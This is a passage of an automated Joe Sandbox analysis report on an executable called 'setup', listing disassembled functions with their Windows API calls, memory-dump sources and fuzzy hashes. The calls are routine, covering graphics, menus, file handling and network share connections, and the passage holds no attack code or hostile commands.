                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue$PrivateProfileString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2114517702-0
                                                                                                                          • Opcode ID: 17fea3c3813d3e534f2aa3c6ff8137f57d4bf5b30e46ced8e6fec50ed86a2a61
                                                                                                                          • Instruction ID: dde84bb0c9c801e82ac04907e4550f75e1b7f3fee9b45a230a2f728aba4b7bb7
                                                                                                                          • Opcode Fuzzy Hash: 17fea3c3813d3e534f2aa3c6ff8137f57d4bf5b30e46ced8e6fec50ed86a2a61
                                                                                                                          • Instruction Fuzzy Hash: F0418271900229EFDB25DF54CC49EAEB7B8EF08310F1041AAF515A3282DB309E55EFA1
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C0FB32
                                                                                                                            • Part of subcall function 00C08836: __EH_prolog3.LIBCMT ref: 00C0883D
                                                                                                                            • Part of subcall function 00C08836: InitializeCriticalSection.KERNEL32(?,00000004), ref: 00C08848
                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00C0FC0B
                                                                                                                          • SystemParametersInfoW.USER32(00000068,00000000,?,00000000), ref: 00C0FC7D
                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00C0FCA9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalH_prolog3InitializeSection$CursorInfoLoadParametersSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3061984961-0
                                                                                                                          • Opcode ID: 82076de04612788b5b6ba46c6509cf8bb5776868f97cab7757ae63ae08b2b6f2
                                                                                                                          • Instruction ID: 0d7b8eab72914c78253c227f7f9fb178815a7e31c5eb3d78bf6743437e4d0c67
                                                                                                                          • Opcode Fuzzy Hash: 82076de04612788b5b6ba46c6509cf8bb5776868f97cab7757ae63ae08b2b6f2
                                                                                                                          • Instruction Fuzzy Hash: 5B5127B0A00B56EFC708CF69C888BD9FBB0BF19304F50862ED56C9B241D7B16255DB94
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C14D68
                                                                                                                            • Part of subcall function 00C2CF8A: __EH_prolog3.LIBCMT ref: 00C2CF91
                                                                                                                            • Part of subcall function 00C2CF8A: GetDC.USER32(00000000), ref: 00C2CFBD
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D822
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D838
                                                                                                                          • lstrlenA.KERNEL32 ref: 00C14DDC
                                                                                                                          • lstrlenA.KERNEL32(?,?), ref: 00C14DEF
                                                                                                                          • GetTabbedTextExtentW.USER32(?,?,00000001,00000001,?), ref: 00C14E38
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ObjectSelectlstrlen$ExtentH_prolog3H_prolog3_TabbedText
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3717232549-0
                                                                                                                          • Opcode ID: 45a1711835bd232b7e40e9832385f401f8ca3ef622b8a2ba13862f5ce0b65f02
                                                                                                                          • Instruction ID: 5f3c4d97a4d9d52357fdf0b99d74dabd22ae0b5188cf303d67246dea4ee933d3
                                                                                                                          • Opcode Fuzzy Hash: 45a1711835bd232b7e40e9832385f401f8ca3ef622b8a2ba13862f5ce0b65f02
                                                                                                                          • Instruction Fuzzy Hash: 49415871D00129AFCF08EFA8D891AEDBBB5FF19310F048129E416BB255DB30AD51DBA0
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000007,000006CC,00C15FDD,?), ref: 00C23A86
                                                                                                                            • Part of subcall function 00C23B61: NetServerGetInfo.NETAPI32(?,00000064,?,?,00000000), ref: 00C23BA3
                                                                                                                            • Part of subcall function 00C23B61: NetApiBufferFree.NETAPI32(?,?,00000000), ref: 00C23BB9
                                                                                                                            • Part of subcall function 00C23B61: WNetAddConnection3W.MPR(00000000,?,00000000,00000000,00000008), ref: 00C23C0F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BufferConnection3ErrorFreeInfoLastServer
                                                                                                                          • String ID: Update.scp$\\?\$\\?\UNC\
                                                                                                                          • API String ID: 75736065-795958587
                                                                                                                          • Opcode ID: c112c01f44742aa318a2f6398fa37cfcfdb209eaf4f7815d29d9ee43cbf460a2
                                                                                                                          • Instruction ID: 8213e48c4ca4870206303f45b53531de531024f84b6ba429b4a6919f4ade9dbb
                                                                                                                          • Opcode Fuzzy Hash: c112c01f44742aa318a2f6398fa37cfcfdb209eaf4f7815d29d9ee43cbf460a2
                                                                                                                          • Instruction Fuzzy Hash: A831EB32900364A6DA24AEB46C4BFAF73A89F01710F20496AF319D75C2DA78DB44E674
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C11445
                                                                                                                            • Part of subcall function 00C2CFF3: __EH_prolog3.LIBCMT ref: 00C2CFFA
                                                                                                                            • Part of subcall function 00C2CFF3: BeginPaint.USER32(?,?,00000004,00C389E0,?,00000058,00C1C274), ref: 00C2D026
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C11468
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00C11480
                                                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C114B8
                                                                                                                            • Part of subcall function 00C0E8D1: CreateSolidBrush.GDI32(?), ref: 00C0E905
                                                                                                                            • Part of subcall function 00C0E8D1: FillRect.USER32(?,?,00000000), ref: 00C0E936
                                                                                                                            • Part of subcall function 00C0E8D1: DeleteObject.GDI32(00000000), ref: 00C0E93D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Create$CompatibleRect$BeginBitmapBrushClientDeleteFillH_prolog3H_prolog3_ObjectPaintSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 931016122-0
                                                                                                                          • Opcode ID: 10a50fe3a5bb43140f64504f5907a44fa16cbfa9279f465154057cf71158585a
                                                                                                                          • Instruction ID: 7141daaa58bb61cd4b2e11c7bd6a75f23b02d0933bed6c8c2a74600d62f13381
                                                                                                                          • Opcode Fuzzy Hash: 10a50fe3a5bb43140f64504f5907a44fa16cbfa9279f465154057cf71158585a
                                                                                                                          • Instruction Fuzzy Hash: 71418E729001289BCB14FBB8CD95AFDBB36FF96300F044258EA0367556DB356E54EBA0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C30A91
                                                                                                                          • IsMenu.USER32(00000000), ref: 00C30ACD
                                                                                                                          • AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 00C30AE5
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C30B2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$ClientWindow$AdjustLongMenu
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3435883281-0
                                                                                                                          • Opcode ID: d36fe25aa9f51b623381bd986f9c83ed312f10c243378285dbf312eb715454eb
                                                                                                                          • Instruction ID: 029e7598f22d8bd3dbf0544ae0594313a204f497e231c19be97832b42f16f73c
                                                                                                                          • Opcode Fuzzy Hash: d36fe25aa9f51b623381bd986f9c83ed312f10c243378285dbf312eb715454eb
                                                                                                                          • Instruction Fuzzy Hash: AB316132A10209AFDB14EBA5C999FBEBBB9EF58314F144159F901A7251DB30AE40DB90
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C361A1
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C361F1
                                                                                                                          • GetParent.USER32(?), ref: 00C3623B
                                                                                                                          • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 00C36261
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeH_prolog3MessageParentSendTask
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4225250527-0
                                                                                                                          • Opcode ID: 94cf5acc4b2e38d56aeee93c44375e24373358ca650ce818c084202ecee59f2e
                                                                                                                          • Instruction ID: e5ac44d356df4c8f012ee37cbfc96b77c224fbe71425f7ab478047978a7266c8
                                                                                                                          • Opcode Fuzzy Hash: 94cf5acc4b2e38d56aeee93c44375e24373358ca650ce818c084202ecee59f2e
                                                                                                                          • Instruction Fuzzy Hash: B2318F31A00216EFCF04EFA8CC95AAEB774BF04324F118619F565A72E1DF31AA15DB94
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,00C08A39,?,?,?,00000000), ref: 00C08DF8
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C08E11
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C08E1A
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C08E25
                                                                                                                            • Part of subcall function 00C09270: SetEvent.KERNEL32(?,?,00C08DDE,?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C0927D
                                                                                                                            • Part of subcall function 00C09270: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00C08DDE,?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C0928B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateErrorEventHandleLastObjectSingleSizeWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3459873347-0
                                                                                                                          • Opcode ID: bbd2587e9e770ccba8c7cea1d4ab653cc46380802449254a71eb525e146b95ee
                                                                                                                          • Instruction ID: 80bebc1fdf34032835b5a1ddf136df4fd75a67d19f167caa89d5700322720d82
                                                                                                                          • Opcode Fuzzy Hash: bbd2587e9e770ccba8c7cea1d4ab653cc46380802449254a71eb525e146b95ee
                                                                                                                          • Instruction Fuzzy Hash: 2621AD74500704AFD7209F65EC89B6B7BE8FB04714F10451EF4A682AE1DB70AD48CB20
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C14EC3
                                                                                                                          • GetTabbedTextExtentW.USER32(?,?,?,00000001,?), ref: 00C14F81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExtentH_prolog3_TabbedText
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2661843075-0
                                                                                                                          • Opcode ID: d9d243012750605552be34b2c27b1892712919dff43190a3acb37f031eb2d5e3
                                                                                                                          • Instruction ID: 5ab89fac2ca010918f3c7f01ab578d0a4411c67589991872aaadc2e147d444b6
                                                                                                                          • Opcode Fuzzy Hash: d9d243012750605552be34b2c27b1892712919dff43190a3acb37f031eb2d5e3
                                                                                                                          • Instruction Fuzzy Hash: 1331B171900219DFDF04EFA4C886AEDB775FF55314F009029F9166B292DB30AA46EBA0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C87374: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8ABB5,?,00000000,-00000008), ref: 00C873D5
                                                                                                                          • GetLastError.KERNEL32(?,00C797F7,?,?,00C797F7,?,?,00000000,00C6A29E,?,00000000), ref: 00C795C2
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C795C9
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00C797F7,?,?,00C797F7,?,?,00000000,00C6A29E,?,00000000), ref: 00C79603
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C7960A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1913693674-0
                                                                                                                          • Opcode ID: a0436bfe1f61b3a3e967b092ee6389eb3336734207f74db81f035d2e721d08d3
                                                                                                                          • Instruction ID: ca833453f1290d83be477ae51233af5e24c3bc4ee43be0816bcb3d63abf8d706
                                                                                                                          • Opcode Fuzzy Hash: a0436bfe1f61b3a3e967b092ee6389eb3336734207f74db81f035d2e721d08d3
                                                                                                                          • Instruction Fuzzy Hash: 2F212331604219AFCB21AF62C881D6BB7ADFF40364700C629F92D97250E730FD009B90
                                                                                                                          APIs
                                                                                                                          • CreatePopupMenu.USER32 ref: 00C12BA7
                                                                                                                          • _strlen.LIBCMT ref: 00C12BD6
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000096,00000000), ref: 00C12C0D
                                                                                                                          • AppendMenuW.USER32(?,00000010,?,00000000), ref: 00C12C33
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Append$CreatePopup_strlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2836490490-0
                                                                                                                          • Opcode ID: 5c6a2b7913c175b2423c2078ff700df37a3c79ef453ca7d9cca4f4404542f86d
                                                                                                                          • Instruction ID: df5d8bfcfb9f2227035e738ae9e73bad6ed351feb9a53d6807adb0b0bead5568
                                                                                                                          • Opcode Fuzzy Hash: 5c6a2b7913c175b2423c2078ff700df37a3c79ef453ca7d9cca4f4404542f86d
                                                                                                                          • Instruction Fuzzy Hash: 8F219575D00215AFDB10DFA4DC45EEEB7B8EF05710F010165EA12E7291DB719E91EBA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0c806bf36acdeee4009df8bbe48fb40643e5ac2d4641e24de9175b61e9512745
                                                                                                                          • Instruction ID: f4c4b8638b37bc8767ff3c933e84317c24fd407f2ec0c38f8068b190ac6ae3de
                                                                                                                          • Opcode Fuzzy Hash: 0c806bf36acdeee4009df8bbe48fb40643e5ac2d4641e24de9175b61e9512745
                                                                                                                          • Instruction Fuzzy Hash: B2219071204219AFDB61AFA58C4196B77AEFF41364B10C629F92ED7251D730EE10A7A0
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C0F916
                                                                                                                          • CreateCompatibleDC.GDI32(00000001), ref: 00C0F96F
                                                                                                                          • CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 00C0F98D
                                                                                                                          • GetBkColor.GDI32(?), ref: 00C0F9C5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CompatibleCreate$BitmapColorH_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2424072587-0
                                                                                                                          • Opcode ID: 9cb0c2189bde9d7462bff94a1f8d1688c4fa959af8d5b4a31ff7f38d6d08ee35
                                                                                                                          • Instruction ID: e02999dbc9db423a761868de1b181945f1d86328169631245e257e6306d0e6fe
                                                                                                                          • Opcode Fuzzy Hash: 9cb0c2189bde9d7462bff94a1f8d1688c4fa959af8d5b4a31ff7f38d6d08ee35
                                                                                                                          • Instruction Fuzzy Hash: 263126B0600A11EFCB64DF69C984A1ABBF4FF08300704866EE45ACBA55EB30E914DF94
                                                                                                                          APIs
                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00C88B7D
                                                                                                                            • Part of subcall function 00C87374: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8ABB5,?,00000000,-00000008), ref: 00C873D5
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C88BB5
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C88BD5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 158306478-0
                                                                                                                          • Opcode ID: ccf40a9b66e89f58dcbf057a2e0d4329b62208701e67a5360773ae9d0f15ac27
                                                                                                                          • Instruction ID: 9928bdfdcc5a7660a8a0c478fdd2829c28d0e0e20e38b689d007319653a41684
                                                                                                                          • Opcode Fuzzy Hash: ccf40a9b66e89f58dcbf057a2e0d4329b62208701e67a5360773ae9d0f15ac27
                                                                                                                          • Instruction Fuzzy Hash: FF1100F15056067F6A1137B2AD8DEBF295CDE863EC3510025F802D2101FE24DE0063B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
